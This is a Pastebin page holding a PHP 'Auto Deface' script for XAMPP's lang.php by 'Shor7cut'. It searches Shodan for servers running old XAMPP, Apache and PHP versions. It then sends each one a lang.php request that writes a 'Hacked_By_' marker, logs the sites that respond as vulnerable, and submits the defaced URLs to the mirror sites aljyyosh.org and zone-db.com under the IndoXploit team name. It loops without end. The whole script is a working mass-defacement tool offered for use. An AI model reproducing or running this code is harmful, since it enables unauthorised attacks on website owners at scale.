Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // SET API CTRL + F = $api = " ";
- // <code> by shor7CUT
- <?php
- error_reporting(0);
- set_time_limit(0);
- date_default_timezone_set('asia/jakarta');
- logos();
- cari_target();
- function cari_target() {
- $time = microtime(true);
- $dork = array (
- 'xampp',
- 'xampp Apache/2.2.3',
- 'xampp Apache/2.2.4',
- 'xampp Apache/2.2.6',
- 'xampp Apache/2.2.8',
- 'xampp Apache/2.2.9',
- 'xampp Apache/2.2.11',
- 'xampp Apache/2.2.12',
- 'xampp Apache/2.2.14',
- 'xampp Apache/2.2.17',
- 'xampp Apache/2.2.21',
- 'xampp Apache/2.4.2',
- 'xampp Apache/2.4.3',
- 'xampp Apache/2.4.10',
- 'xampp Apache/2.4.12',
- 'xampp PHP/5.2.1',
- 'xampp PHP/5.2.2',
- 'xampp PHP/5.2.3',
- 'xampp PHP/5.2.4',
- 'xampp PHP/5.2.5',
- 'xampp PHP/5.2.6',
- 'xampp PHP/5.2.8',
- 'xampp PHP/5.2.9',
- 'xampp PHP/5.3.0',
- 'xampp PHP/5.3.1',
- 'xampp PHP/5.3.5',
- 'xampp PHP/5.3.8',
- 'xampp PHP/5.4.4',
- 'xampp PHP/5.4.7',
- 'xampp PHP/5.4.31',
- 'xampp PHP/5.5.15',
- 'xampp PHP/5.5.19',
- 'xampp PHP/5.6.3',
- 'xampp PHP/5.5.24',
- 'xampp PHP/5.6.8',
- 'xampp PHP/4.4.5',
- 'xampp PHP/4.4.6',
- 'xampp PHP/4.4.7',
- 'xampp PHP/4.4.8',
- 'xampp PHP/4.4.9'
- );
- $api = " ";
- $hacker = "Shor7cut";
- $name_log = "lang_log_xampp_mirror_zonedb.txt";
- $name_target = "lang_target_xampp_mirror_zonedb.txt";
- $name_result = "lang_result_xampp_mirror_zonedb.html";
- $name_lapor = "Laporan.txt";
- $no_Scan=1;
- $tanggal_scan= date("d-m-Y h:i:s a");
- $jumlah_vuln=0;
- $jumlah_target_baru=0;
- $jumlah_submit_success=0;
- $jumlah_submit_success_zdb=0;
- $mulai_scan=date_default_timezone_set('asia/jakarta');
- $total_dork = count($dork);
- $no=1;
- // Hapus File \\
- unlink("$name_target");
- //
- echo "\r\n|+> Total Dork : ".$total_dork."\r\n";
- echo "|+> Memulai Mencari target\r\n";
- loading();
- foreach ($dork as $dorks) {
- $noms = "[".$no_Scan."/".$total_dork."]";
- echo "|+> Mencari Target : ".$noms."\r\n|+> Scanned in ";
- $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
- $json = json_decode($get,true);
- foreach ($json['matches'] as $key => $value) {
- $fp = fopen($name_target, 'a+');
- fwrite($fp, $value['ip_str']."|");
- fclose($fp);
- } // End Foreach
- $target_live = $json['total'];
- if($target_live>100){
- $target_live=100;
- }
- $total_target=$target_live+$total_target;
- echo ceil((microtime(true)-$time))." Detik\r\n|+> Found Target : [".$target_live."]\r\n\n";
- $no_Scan++;
- }
- echo "[+] Total Target : [".$total_target."]\r\n";
- $buka_file = fopen($name_target, "r");
- $baca_file = fgets($buka_file);
- $target = explode("|", $baca_file);
- echo "[+] Memulai Mencari vulnerable\r\n";
- loading()."\r\n\n";
- foreach ($target as $sites) {
- echo "-> Info : [".$no."/".$total_target."] : ".$sites."\r\n-> Status : "; //pesan
- $link1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
- $link2 = "$sites/security/lang.php?Hacked_By_$hacker";
- $link1_result = "$sites/xampp/lang.tmp?";
- $link2_result = "$sites/security/lang.tmp?";
- $xamppcurl = curl_init("$link1");
- curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
- curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
- $result1 = curl_exec($xamppcurl);
- $xamppcur2 = curl_init("$link2");
- curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
- curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
- $result2 = curl_exec($xamppcur2);
- if(eregi("Hacked_By_",$result1))
- { echo "vulnerable\r\n";
- $log = "http://$link1_result";
- $hasil = '<a href="http://'.$link1_result.' target="_blank">http://'.$link1_result.'</a><br>';
- $buka_file = fopen($name_log, "r"); // membaca file log
- $baca_file = fgets($buka_file);
- $buka_file = file_get_contents($name_log);
- if(!eregi($sites, $buka_file)){
- //save result
- $fp = fopen($name_result, 'a+');
- fwrite($fp, $hasil);
- fclose($fp);
- //save log
- $fp = fopen($name_log, 'a+');
- fwrite($fp, $sites."\r\n");
- fclose($fp);
- echo "-> Save-DB : Telah Ditambahkan\r\n";
- $jumlah_vuln++;
- $jumlah_target_baru++;
- }else {
- echo "-> Save-DB : Tidak Ditambahkan\r\n";
- }
- $cubit = curl_init ();
- curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($cubit, CURLOPT_POST, 1);
- curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
- curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
- curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
- if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
- echo "-> Submit Mirror [aljyyosh] : Success\r\n";
- $jumlah_submit_success++;
- }else {
- echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
- }
- $post = array(
- "hacker" => "$hacker",
- "team" => "IndoXploit",
- "url" => "$hasil",
- "poc" => "Other Web Application Bug",
- "key" => "kucing",
- "secret" => "tai",
- );
- $cubits = curl_init ("http://zone-db.com/notify_act.php");
- curl_setopt($cubits, CURLOPT_HEADER, 1);
- curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($cubits,CURLOPT_TIMEOUT,10);
- curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
- curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
- curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
- curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
- $result_mirror = curl_exec($cubits);
- if (preg_match("#added#is", $result_mirror)){
- echo "-> Submit Mirror [zone-db] : Success\r\n\n";
- $jumlah_submit_success++;
- $jumlah_submit_success_zdb++;
- }else{
- echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
- }
- }else if(eregi("Hacked_By_",$result2))
- { echo "vulnerable\r\n";
- $log = "http://$link2_result";
- $hasil = '<a href="http://'.$link2_result.' target="_blank>http://'.$link2_result.'</a><br>';
- $buka_file = fopen($name_log, "r"); // membaca file log
- $baca_file = fgets($buka_file);
- $buka_file = file_get_contents($name_log);
- if(!eregi($sites, $buka_file)){
- //save result
- $fp = fopen($name_result, 'a+');
- fwrite($fp, $hasil);
- fclose($fp);
- //save log
- $fp = fopen($name_log, 'a+');
- fwrite($fp, $sites."\r\n");
- fclose($fp);
- echo "-> Save-DB : Telah Ditambahkan\r\n";
- $jumlah_vuln++;
- $jumlah_target_baru++;
- }else {
- echo "-> Save-DB : Tidak Ditambahkan\r\n";
- }
- $cubit = curl_init ();
- curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($cubit, CURLOPT_POST, 1);
- curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
- curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
- curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
- if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
- echo "-> Submit Mirror [aljyyosh] : Success\r\n";
- $jumlah_submit_success++;
- }else {
- echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
- }
- $post = array(
- "hacker" => "$hacker",
- "team" => "IndoXploit",
- "url" => "$hasil",
- "poc" => "Other Web Application Bug",
- "key" => "kucing",
- "secret" => "tai",
- );
- $cubits = curl_init ("http://zone-db.com/notify_act.php");
- curl_setopt($cubits, CURLOPT_HEADER, 1);
- curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($cubits,CURLOPT_TIMEOUT,10);
- curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
- curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
- curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
- curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
- $result_mirror = curl_exec($cubits);
- if (preg_match("#added#is", $result_mirror)){
- echo "-> Submit Mirror [zone-db] : Success\r\n\n";
- $jumlah_submit_success++;
- $jumlah_submit_success_zdb++;
- }else{
- echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
- }
- }else {
- echo "not vulnerable\r\n\n";
- }
- $no++;
- } //end:foreach|sites
- $lapor.= "\r\n------------[ZONE DB MIRROR]-----------------\r\n";
- $lapor.= "-> Laporan : ".$tanggal_scan."\r\n";
- $lapor.= "-> Total Target : ".$total_target."\r\n";
- $lapor.= "-> Total Database Baru : ".$jumlah_target_baru."\r\n";
- $lapor.= "-> Total Success Submit aljyyosh/zone-db: ".$jumlah_submit_success."|".$jumlah_submit_success_zdb++."\r\n";
- $lapor.= "-> Scan End : ".date("d-m-Y h:i:s a")."\r\n";
- $lapor.= "\r\n-----------------------------\r\n";
- echo $lapor;
- $fp = fopen($name_lapor, 'a+');
- fwrite($fp, $lapor);
- fclose($fp);
- reload_manunisi();
- } //end:fungsi
- function logos() {
- $logos.=" _________.__ _________ __ \r\n";
- $logos.=" / _____/| |__ __________\______ \ ____ __ ___/ |_ \r\n";
- $logos.=" \_____ \ | | \ / _ \_ __ \ / // ___\| | \ __\ \r\n";
- $logos.=" / \| Y ( <_> ) | \/ / /\ \___| | /| | \r\n";
- $logos.="/_______ /|___| /\____/|__| /____/ \___ >____/ |__| \r\n";
- $logos.=" \/ \/ \/ \r\n";
- $logos.="---------[ Auto Deface (Xampp Lang.php) by Shor7cut ]-------\r\n";
- echo $logos;
- }
- function reload_manunisi() {
- cari_target();
- }
- function loading() {
- echo "-> Pleas wait ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- echo " ";
- sleep(1);
- } echo "\r\n\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement